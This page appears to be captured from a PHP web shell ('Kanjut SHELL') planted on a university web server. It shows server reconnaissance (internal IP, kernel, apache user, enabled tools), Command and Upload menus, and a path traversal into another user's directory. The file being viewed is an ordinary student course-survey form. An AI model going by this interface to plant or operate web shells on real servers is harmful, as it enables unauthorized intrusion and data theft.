Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 3.141.42.41
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/acyurksaitis/../jlsnowden/www/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/acyurksaitis/../jlsnowden/www/SurveyPageSession.php
<?php	session_start();	

// File:SurveyPageSession.php

?>

<CENTER>
<H2>
Survey Questions:
</H2>
<?php
$name=$_POST['name'];
$course=$_POST['course'];

$gender=$_POST['gen'];
$class=$_POST['class'];

$_SESSION['name']= $name;
$_SESSION['course']= $course;

$_SESSION['gen']= $gender;
$_SESSION['class']= $class;
?>
<HR>


<FORM action=SurveyPageSession2.php method=post>
1.Did you feel that the course was useful to you?
<P>
<INPUT type=radio name=q1 value=SA checked> Strongly Agree
<INPUT type=radio name=q1 value=A> Agree 
<INPUT type=radio name=q1 value=D> Disagree
<P>
2.Were you satisfied with what you learned?
<P>
<INPUT type=radio name=q2 value=SA2 checked> Strongly Agree
<INPUT type=radio name=q2 value=A2 > Agree
<INPUT type=radio name=q2 value=D2 > Disagree
<P>
3.Was your instructor helpful?
<P>
<INPUT type=radio name=q3 value=SA3  checked> Strongly Agree
<INPUT type=radio name=q3 value=A3 > Agree
<INPUT type=radio name=q3 value=D3> Disagree
<P>
4.Did you have enough time for homework?
<P>
<INPUT type=radio name=q4 value=SA4 checked> Strongly Agree
<INPUT type=radio name=q4 value=A4 > Agree
<INPUT type=radio name=q4 value=D4 > Disagree
<P>
Additional Comments:
<P>
<textarea rows=10px cols=50px name=comments>
</textarea>

<P>
<INPUT type=submit value=Submit>
<INPUT type=reset value=Reset>
<P>


</FORM>
</CENTER>



Stv3n404 - 2023